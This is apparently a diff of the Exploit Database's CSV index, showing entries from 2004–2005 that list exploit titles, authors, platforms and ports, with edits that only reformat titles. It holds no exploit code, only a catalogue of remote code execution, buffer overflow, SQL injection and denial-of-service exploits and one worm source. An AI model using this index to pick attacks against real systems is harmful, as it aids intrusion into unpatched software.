+572,platforms/windows/remote/572.pl,"Eudora 6.2.0.7 - Attachment Spoofer Exploit",2004-10-11,"Paul Szabo",windows,remote,0 573,platforms/windows/remote/573.c,"Icecast 2.0.1 Win32 - Remote Code Execution Exploit (modded)",2004-10-12,K-C0d3r,windows,remote,8000 574,platforms/php/webapps/574.txt,"ocPortal 1.0.3 - Remote File Inclusion",2004-10-13,Exoduks,php,webapps,0 577,platforms/windows/remote/577.c,"YahooPOPs 1.6 - SMTP Port Buffer Overflow Exploit",2004-10-15,class101,windows,remote,25 @@ -454,7 +454,7 @@ id,file,description,date,author,platform,type,port 587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow Exploit",2004-10-21,xCrZx,linux,local,0 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21 589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0 -590,platforms/windows/remote/590.c,"ShixxNote 6.net Remote Buffer Overflow Exploit",2004-10-22,class101,windows,remote,2000 +590,platforms/windows/remote/590.c,"ShixxNote 6.net - Remote Buffer Overflow Exploit",2004-10-22,class101,windows,remote,2000 591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String Exploit (not setuid)",2004-10-23,CoKi,linux,local,0 592,platforms/windows/remote/592.py,"Ability Server 2.34 - (APPE) Remote Buffer Overflow Exploit",2004-10-23,KaGra,windows,remote,21 593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 Ftp Server - Remote DoS",2004-10-24,KaGra,windows,dos,0 @@ -462,7 +462,7 @@ id,file,description,date,author,platform,type,port 598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25 599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service",2004-10-26,muts,windows,dos,0 600,platforms/linux/local/600.c,"GD Graphics Library Heap Overflow Proof of Concept Exploit",2004-10-26,anonymous,linux,local,0 -601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0 +601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0 602,platforms/sco/local/602.c,"SCO Openserver 5.0.7 - (MMDF deliver) Local Root Exploit",2004-10-26,"Ramon Valle",sco,local,0 603,platforms/windows/dos/603.c,"Master of Orion III 1.2.5 - Denial of Service",2004-10-27,"Luigi Auriemma",windows,dos,0 604,platforms/windows/dos/604.c,"Age of Sail II 1.04.151 - Remote Buffer Overflow Exploit",2004-03-03,"Luigi Auriemma",windows,dos,0 @@ -475,7 +475,7 @@ id,file,description,date,author,platform,type,port 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0 616,platforms/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 -619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808 +619,platforms/windows/remote/619.c,"CCProxy Log - Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808 620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25 621,platforms/windows/remote/621.c,"CCProxy 6.2 - (ping) Remote Buffer Overflow Exploit",2004-11-10,KaGra,windows,remote,23 623,platforms/windows/remote/623.c,"SlimFTPd 3.15 - Remote Buffer Overflow Exploit",2004-11-10,class101,windows,remote,21 @@ -496,7 +496,7 @@ id,file,description,date,author,platform,type,port 641,platforms/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 - File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution Exploit",2004-11-20,RoMaNSoFt,cgi,webapps,0 644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow Exploit",2004-11-21,"Reed Arvin",windows,remote,110 -645,platforms/php/webapps/645.pl,"GFHost PHP GMail Remote Command Execution Exploit",2004-11-21,spabam,php,webapps,0 +645,platforms/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution Exploit",2004-11-21,spabam,php,webapps,0 647,platforms/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution Exploit",2004-11-22,RusH,php,webapps,0 648,platforms/php/webapps/648.pl,"Invision Power Board 2.0.0 < 2.0.2 - SQL Injection",2004-11-22,RusH,php,webapps,0 649,platforms/windows/dos/649.c,"wodFtpDLX Client - ActiveX Control Buffer Overflow Crash Exploit",2004-11-22,Komrade,windows,dos,0 @@ -516,9 +516,9 @@ id,file,description,date,author,platform,type,port 665,platforms/windows/dos/665.c,"Orbz Game 2.10 - Remote Buffer Overflow Exploit",2004-11-29,"Luigi Auriemma",windows,dos,0 667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - (http/pna) Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos,0 668,platforms/windows/remote/668.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit (C) (1)",2004-11-30,JohnH,windows,remote,143 -669,platforms/linux/local/669.c,"Aspell (word-list-compress) Command Line Stack Overflow",2004-12-01,c0d3r,linux,local,0 +669,platforms/linux/local/669.c,"Aspell (word-list-compress) - Command Line Stack Overflow",2004-12-01,c0d3r,linux,local,0 670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (C) (2)",2004-12-01,JohnH,windows,remote,143 -671,platforms/windows/dos/671.c,"Neverwinter Nights special Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0 +671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0 672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0 673,platforms/php/webapps/673.cgi,"phpBB 2.0.10 - Remote Command Execution Exploit (CGI)",2004-12-03,ZzagorR,php,webapps,0 675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0 @@ -533,7 +533,7 @@ id,file,description,date,author,platform,type,port 685,platforms/linux/dos/685.c,"Linux Kernel 2.4.28 / 2.6.9 - scm_send Local Denial of Service",2004-12-14,"Paul Starzetz",linux,dos,0 686,platforms/linux/dos/686.c,"Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service",2004-12-14,"Paul Starzetz",linux,dos,0 687,platforms/windows/dos/687.c,"OpenText FirstClass 8.0 - HTTP Daemon /Search Remote DoS",2004-12-15,dila,windows,dos,0 -688,platforms/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service",2004-12-15,x90c,hardware,dos,0 +688,platforms/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer - ICMP Denial of Service",2004-12-15,x90c,hardware,dos,0 689,platforms/multiple/remote/689.pl,"wget 1.9 - Directory Traversal Exploit",2004-12-15,jjminar,multiple,remote,0 690,platforms/linux/dos/690.c,"Linux Kernel 2.4.28 / 2.6.9 - vc_resize int Local Overflow Exploit",2004-12-16,"Georgi Guninski",linux,dos,0 691,platforms/linux/dos/691.c,"Linux Kernel 2.4.28 / 2.6.9 - Memory Leak Local DoS",2004-12-16,"Georgi Guninski",linux,dos,0 @@ -542,7 +542,7 @@ id,file,description,date,author,platform,type,port 694,platforms/windows/local/694.c,"WinRAR 3.4.1 - Corrupt ZIP File PoC",2004-12-16,"Vafa Khoshaein",windows,local,0 695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0 697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - unserialize() Remote Exploit (Compiled)",2004-12-17,overdose,php,webapps,0 -698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local,0 +698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow Exploit",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local,0 699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow Exploit",2004-12-20,cees-bart,aix,local,0 700,platforms/windows/dos/700.html,"Microsoft Internet Explorer & MSN - Memory_Access_Violation DoS",2004-12-21,"Emmanouel Kellinis",windows,dos,0 701,platforms/aix/local/701.sh,"AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution",2004-12-21,cees-bart,aix,local,0 @@ -552,7 +552,7 @@ id,file,description,date,author,platform,type,port 705,platforms/multiple/remote/705.pl,"Webmin - BruteForce / Command Execution Exploit",2004-12-22,Di42lo,multiple,remote,10000 711,platforms/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow Exploit",2005-04-24,cybertronic,windows,remote,21 712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Exploit",2004-12-23,pucik,linux,remote,8000 -713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp Local Buffer Overflow Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0 +713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow Exploit (2)",2004-12-24,"Marco Ivaldi",solaris,local,0 715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Local Root Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)",2004-12-24,"Marco Ivaldi",solaris,remote,513 @@ -567,7 +567,7 @@ id,file,description,date,author,platform,type,port 733,platforms/windows/remote/733.c,"Microsoft Windows 2000 - WINS Remote Code Execution Exploit",2004-12-31,zuc,windows,remote,42 734,platforms/windows/remote/734.c,"Microsoft Windows - NetDDE Remote Buffer Overflow Exploit (MS04-031)",2004-12-31,houseofdabus,windows,remote,139 736,platforms/windows/dos/736.c,"SOLDNER Secret Wars 30830 - Denial of Service",2005-01-04,"Luigi Auriemma",windows,dos,20000 -737,platforms/php/webapps/737.txt,"QWikiwiki Directory Traversal",2005-01-04,Madelman,php,webapps,0 +737,platforms/php/webapps/737.txt,"QWikiwiki - Directory Traversal",2005-01-04,Madelman,php,webapps,0 738,platforms/php/dos/738.c,"iWebNegar 1.1 - Configuration Nullification Denial of Service",2005-01-04,c0d3r,php,dos,0 739,platforms/bsd/local/739.c,"FreeBSD TOP Format String",2001-07-23,truefinder,bsd,local,0 740,platforms/php/webapps/740.pl,"phpBB 2.0.10 - Bot Install (Altavista) (ssh.D.Worm)",2005-01-04,"Severino Honorato",php,webapps,0 @@ -623,7 +623,7 @@ id,file,description,date,author,platform,type,port 797,platforms/windows/dos/797.py,"Foxmail 2.0 - (MAIL FROM:) Denial of Service",2005-02-07,OYXin,windows,dos,0 798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 799,platforms/osx/dos/799.c,"Mac OS X - AppleFileServer Remote Denial of Service",2005-02-08,nemo,osx,dos,0 -800,platforms/php/webapps/800.txt,"PostNuke PostWrap Module Remote Exploit",2005-02-08,"ALBANIA SECURITY",php,webapps,0 +800,platforms/php/webapps/800.txt,"PostNuke PostWrap Module - Remote Exploit",2005-02-08,"ALBANIA SECURITY",php,webapps,0 801,platforms/php/webapps/801.c,"PHP-Nuke 7.4 - Admin Exploit",2005-02-09,Silentium,php,webapps,0 802,platforms/windows/remote/802.cpp,"MSN Messenger - .PNG Image Buffer Overflow Download Shellcoded Exploit",2005-02-09,ATmaCA,windows,remote,0 803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0 @@ -638,7 +638,7 @@ id,file,description,date,author,platform,type,port 812,platforms/linux/remote/812.c,"Exim 4.43 - auth_spa_server() Remote PoC Exploit",2005-02-12,"Yuri Gushin",linux,remote,25 813,platforms/windows/dos/813.c,"Quake 3 Engine Infostring Crash and Shutdown Exploit",2005-02-12,"Luigi Auriemma",windows,dos,0 814,platforms/php/webapps/814.txt,"MercuryBoard 1.1.1 - SQL Injection",2005-02-12,Zeelock,php,webapps,0 -815,platforms/linux/dos/815.c,"CA BrightStor ARCserve Backup Remote Buffer Overlow PoC",2005-02-12,cybertronic,linux,dos,0 +815,platforms/linux/dos/815.c,"CA BrightStor ARCserve Backup - Remote Buffer Overlow PoC",2005-02-12,cybertronic,linux,dos,0 816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0 817,platforms/cgi/dos/817.pl,"AwStats 6.4 - Denial of Service",2005-02-14,GHC,cgi,dos,0 818,platforms/php/webapps/818.txt,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,php,webapps,0 @@ -653,7 +653,7 @@ id,file,description,date,author,platform,type,port 828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617 829,platforms/hardware/remote/829.c,"Thomson TCW690 POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80 830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 - File Request Format String Remote Exploit (Windows)",2005-02-19,mandragore,windows,remote,8000 -831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 RSA Authentication Heap Overflow Exploit",2005-02-20,jsk,linux,remote,5803 +831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 - RSA Authentication Heap Overflow Exploit",2005-02-20,jsk,linux,remote,5803 832,platforms/php/webapps/832.txt,"vBulletin 3.0.6 - PHP Code Injection",2005-02-22,pokley,php,webapps,0 833,platforms/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 834,platforms/windows/local/834.c,"eXeem 0.21 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 @@ -661,7 +661,7 @@ id,file,description,date,author,platform,type,port 836,platforms/windows/local/836.c,"WWW File Share Pro 2.72 - Local Password Disclosure Exploit",2005-02-23,Kozan,windows,local,0 837,platforms/windows/local/837.c,"Chat Anywhere 2.72a - Local Password Disclosure Exploit",2005-02-23,Kozan,windows,local,0 838,platforms/multiple/dos/838.pl,"webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service",2005-02-24,karak0rsan,multiple,dos,0 -839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager Local Password Disclosure Exploit",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0 +839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure Exploit",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0 840,platforms/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0 841,platforms/windows/dos/841.c,"Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0 842,platforms/linux/dos/842.c,"wu-ftpd 2.6.2 - File Globbing Denial of Service",2005-02-25,str0ke,linux,dos,0 @@ -674,12 +674,12 @@ id,file,description,date,author,platform,type,port 849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - .PNG Image Processing Buffer Overflow Exploit",2005-03-02,"Tal Zeltzer",windows,dos,0 853,platforms/cgi/webapps/853.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit (extra)",2005-03-02,omin0us,cgi,webapps,0 -854,platforms/windows/remote/854.cpp,"Foxmail 1.1.0.1 POP3 Temp Dir Stack Overflow Exploit",2005-03-02,Swan,windows,remote,110 +854,platforms/windows/remote/854.cpp,"Foxmail 1.1.0.1 - POP3 Temp Dir Stack Overflow Exploit",2005-03-02,Swan,windows,remote,110 855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - HTTP GET request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0 856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - (Bluetooth Nickname) Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 857,platforms/php/webapps/857.txt,"PHP Form Mail 2.3 - Arbitrary File Inclusion",2005-03-05,"Filip Groszynski",php,webapps,0 858,platforms/php/webapps/858.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,php,webapps,0 -859,platforms/windows/remote/859.c,"CA License Server (GETCONFIG) Remote Buffer Overflow Exploit",2005-03-06,class101,windows,remote,10203 +859,platforms/windows/remote/859.c,"CA License Server - (GETCONFIG) Remote Buffer Overflow Exploit",2005-03-06,class101,windows,remote,10203 860,platforms/php/webapps/860.c,"Aztek Forum 4.0 - (myadmin.php) Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 861,platforms/windows/dos/861.c,"Microsoft Windows 2003/XP - Remote Denial of Service",2005-03-07,RusH,windows,dos,0 862,platforms/cgi/webapps/862.txt,"The Includer CGI 1.0 - Remote Command Execution",2005-03-07,"Francisco Alisson",cgi,webapps,0 @@ -787,10 +787,10 @@ id,file,description,date,author,platform,type,port 967,platforms/windows/remote/967.cpp,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit (1)",2005-04-29,ATmaCA,windows,remote,21 968,platforms/windows/remote/968.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit (2)",2005-04-29,c0d3r,windows,remote,21 969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit (3)",2005-04-29,darkeagle,windows,remote,21 -970,platforms/linux/remote/970.c,"Snmppd SNMP Proxy Daemon Remote Format String Exploit",2005-04-29,cybertronic,linux,remote,164 +970,platforms/linux/remote/970.c,"Snmppd - SNMP Proxy Daemon Remote Format String Exploit",2005-04-29,cybertronic,linux,remote,164 971,platforms/windows/local/971.cpp,"BulletProof FTP Server 2.4.0.31 - Local Privilege Escalation Exploit",2005-04-29,"Jerome Athias",windows,local,0 972,platforms/solaris/local/972.c,"Solaris 10.x - ESRI Arcgis Local Root Format String Exploit",2005-04-30,"Kevin Finisterre",solaris,local,0 -973,platforms/linux/local/973.c,"ARPUS/Ce Local File Overwrite Exploit (setuid)",2005-05-01,"Kevin Finisterre",linux,local,0 +973,platforms/linux/local/973.c,"ARPUS/Ce - Local File Overwrite Exploit (setuid)",2005-05-01,"Kevin Finisterre",linux,local,0 974,platforms/linux/local/974.pl,"ARPUS/Ce - Local Overflow Exploit (setuid) (Perl)",2005-05-01,"Kevin Finisterre",linux,local,0 975,platforms/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Buffer Overflow Exploit",2005-05-01,muts,windows,remote,21 976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0 @@ -800,7 +800,7 @@ id,file,description,date,author,platform,type,port 980,platforms/cgi/webapps/980.pl,"I-Mall Commerce - (i-mall.cgi) Remote Command Execution Exploit",2005-05-04,"Jerome Athias",cgi,webapps,0 981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b - Linux Remote Root Format String Exploit",2005-05-05,cybertronic,linux,remote,25 982,platforms/php/webapps/982.c,"ZeroBoard Worm - Source Code",2005-05-06,anonymous,php,webapps,0 -983,platforms/windows/dos/983.cpp,"DataTrac Activity Console Denial of Service",2005-05-06,basher13,windows,dos,0 +983,platforms/windows/dos/983.cpp,"DataTrac Activity Console - Denial of Service",2005-05-06,basher13,windows,dos,0 984,platforms/multiple/dos/984.c,"Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service",2005-05-07,Nicob,multiple,dos,0 986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0 987,platforms/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registration (2)",2005-05-07,Silentium,windows,remote,0 @@ -810,15 +810,15 @@ id,file,description,date,author,platform,type,port 996,platforms/php/webapps/996.pl,"ZPanel 2.5b10 - SQL Injection",2005-05-17,RusH,php,webapps,0 997,platforms/linux/local/997.sh,"cdrdao (Mandrake 10.2) - Local Root Exploit",2005-05-17,newbug,linux,local,0 998,platforms/linux/dos/998.c,"Linux Kernel 2.6.12-rc4 - (ioctl_by_bdev) Local Denial of Service",2005-05-17,alert7,linux,dos,0 -999,platforms/linux/dos/999.c,"Gaim 1.2.1 URL Handling Remote Stack Overflow Exploit",2005-05-17,Ron,linux,dos,0 +999,platforms/linux/dos/999.c,"Gaim 1.2.1 - URL Handling Remote Stack Overflow Exploit",2005-05-17,Ron,linux,dos,0 1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 Remote Denial of Service",2005-05-17,"Konrad Malewski",windows,dos,0 -1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0 +1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail - Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0 1003,platforms/php/webapps/1003.c,"Fusion SBX 1.2 - Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0 1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2)",2005-05-20,Nikyt0x,cgi,webapps,0 1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1)",2005-05-20,Alpha_Programmer,cgi,webapps,0 1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - register.php SQL Injection",2005-05-20,deluxe89,php,webapps,0 1007,platforms/multiple/remote/1007.html,"Mozilla Firefox - view-source:javascript url Code Execution Exploit",2005-05-21,mikx,multiple,remote,0 -1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS Denial of Service",2005-05-21,"Daniel Hartmeier",multiple,dos,0 +1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS - Denial of Service",2005-05-21,"Daniel Hartmeier",multiple,dos,0 1009,platforms/linux/local/1009.c,"Exim 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0 1010,platforms/asp/webapps/1010.pl,"Maxwebportal 1.36 - password.asp Change Password Exploit (3) (Perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 - password.asp Change Password Exploit (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps,0 @@ -830,7 +830,7 @@ id,file,description,date,author,platform,type,port 1017,platforms/php/webapps/1017.php,"phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps,0 1018,platforms/php/webapps/1018.php,"phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2)",2005-05-30,Nikyt0x,php,webapps,0 1019,platforms/windows/local/1019.c,"Microsoft Windows - COM Structured Storage Local Exploit (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local,0 -1020,platforms/php/webapps/1020.c,"Zeroboard 4.1 preg_replace Remote nobody Shell Exploit",2005-05-31,n0gada,php,webapps,0 +1020,platforms/php/webapps/1020.c,"Zeroboard 4.1 - preg_replace Remote nobody Shell Exploit",2005-05-31,n0gada,php,webapps,0 1021,platforms/linux/remote/1021.c,"Ethereal 0.10.10 - (SIP) Protocol Dissector Remote BoF Exploit",2005-05-31,"Team W00dp3ck3r",linux,remote,0 1022,platforms/php/webapps/1022.pl,"MyBulletinBoard (MyBB) 1.00 RC4 - SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 1023,platforms/php/webapps/1023.pl,"myBloggie 2.1.1 < 2.1.2 - SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 @@ -860,7 +860,7 @@ id,file,description,date,author,platform,type,port 1048,platforms/cgi/webapps/1048.pl,"eXtropia Shopping Cart - web_store.cgi Remote Exploit",2005-06-15,"Action Spider",cgi,webapps,0 1049,platforms/php/webapps/1049.php,"Mambo 4.5.2.1 - Fetch Password Hash Remote Exploit",2005-06-15,pokleyzz,php,webapps,0 1050,platforms/php/webapps/1050.pl,"PHP Arena 1.1.3 - pafiledb.php Remote Change Password Exploit",2005-06-15,Alpha_Programmer,php,webapps,0 -1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0 +1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0 1052,platforms/php/webapps/1052.php,"Claroline e-Learning 1.6 - Remote Hash SQL Injection",2005-06-17,mh_p0rtal,php,webapps,0 1053,platforms/php/webapps/1053.pl,"Claroline e-Learning 1.6 - Remote Hash SQL Injection Exploit (2)",2005-06-19,K-C0d3r,php,webapps,0 1055,platforms/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String Exploit",2005-06-20,darkeagle,linux,remote,7144 @@ -868,7 +868,7 @@ id,file,description,date,author,platform,type,port 1057,platforms/php/webapps/1057.pl,"Simple Machines Forum 1.0.4 - (modify) SQL Injection",2005-06-21,"James Bercegay",php,webapps,0 1058,platforms/php/webapps/1058.pl,"MercuryBoard 1.1.4 - SQL Injection",2005-06-21,RusH,php,webapps,0 1059,platforms/php/webapps/1059.pl,"WordPress 1.5.1.1 - 'add new admin' SQL Injection",2005-06-21,RusH,php,webapps,0 -1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0 +1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 - Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0 1061,platforms/php/webapps/1061.pl,"Mambo 4.5.2.1 - SQL Injection",2005-06-21,RusH,php,webapps,0 1062,platforms/php/webapps/1062.pl,"Cacti 0.8.6d - Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 1063,platforms/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users Denial of Service (Perl)",2005-06-22,g30rg3_x,php,dos,0 @@ -893,7 +893,7 @@ id,file,description,date,author,platform,type,port 1082,platforms/php/webapps/1082.pl,"XOOPS 2.0.11 - xmlrpc.php SQL Injection",2005-07-04,RusH,php,webapps,0 1083,platforms/php/webapps/1083.pl,"xmlrpc.php Library 1.3.0 - Remote Command Execution Exploit (2)",2005-07-04,dukenn,php,webapps,0 1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library 1.3.0 - Remote Command Execution Exploit (3)",2005-07-04,"Mike Rifone",php,webapps,0 -1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0 +1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 - Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0 1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure Exploit",2005-07-04,Kozan,windows,local,0 1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Local Root Exploit",2005-07-04,RusH,bsd,local,0 1088,platforms/php/webapps/1088.pl,"Drupal 4.5.3 <= 4.6.1 - Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0 @@ -921,7 +921,7 @@ id,file,description,date,author,platform,type,port 1111,platforms/php/webapps/1111.pl,"Open Bulletin Board 1.0.5 - SQL Injection",2005-07-18,RusH,php,webapps,0 1112,platforms/asp/webapps/1112.txt,"Hosting Controller 6.1 HotFix 2.2 - Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0 1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit)",2005-07-19,str0ke,php,webapps,0 -1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II Generic Remote Exploit",2000-12-21,DiGiT,multiple,remote,5555 +1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II - Generic Remote Exploit",2000-12-21,DiGiT,multiple,remote,5555 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution & Denial of Service",2005-07-21,basher13,windows,remote,0 1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036)",2005-07-21,snooq,windows,dos,0 1118,platforms/windows/remote/1118.c,"SlimFTPd 3.16 - Remote Buffer Overflow Exploit",2005-07-25,redsand,windows,remote,21 @@ -954,7 +954,7 @@ id,file,description,date,author,platform,type,port 1150,platforms/windows/remote/1150.pm,"ZENworks 6.5 Desktop/Server Management - Remote Stack Overflow 